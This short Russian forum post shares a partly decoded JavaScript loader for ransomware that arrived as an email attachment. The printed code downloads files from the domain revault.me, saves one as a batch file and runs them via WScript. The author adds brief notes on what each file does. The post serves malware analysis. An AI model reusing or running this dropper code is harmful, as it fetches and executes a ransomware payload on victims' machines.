Пришло письмо счастья в виде загрузчиком вируса-шифровальщика (javascript).
открыл, декодировал. Кому интересно часть загрузчика:
function BFAF7D2(a,b,c){return 1}A1CB7D83004DE("http://revault.me/doc.css",""+E0AC+"doc_5e9d.doc");function B9C04DFE82D60C(a){D7B6AD1763.Run(a,1,0)}try{B9C04DFE82D60C(""+E0AC+"doc_5e9d.doc")}catch(a){}function C1A8C48F377D(a){D7B6AD1763.Run(a,0,0)}function QE00(a,b,c){return 4}function Q9FB(a){WScript.CreateObject("Scripting.FileSystemObject");return 3}Q9FB();A1CB7D83004DE("http://revault.me/design.css",""+E0AC+"design.css");A1CB7D83004DE("http://revault.me/ins3.css",""+E0AC+"v6c1e63a05.bat");
Загружает батник ins3.css c домена revault.me, который делает всю черную работу. design.css - похоже gnupg.
Вдруг кому покопаться с ними захочется.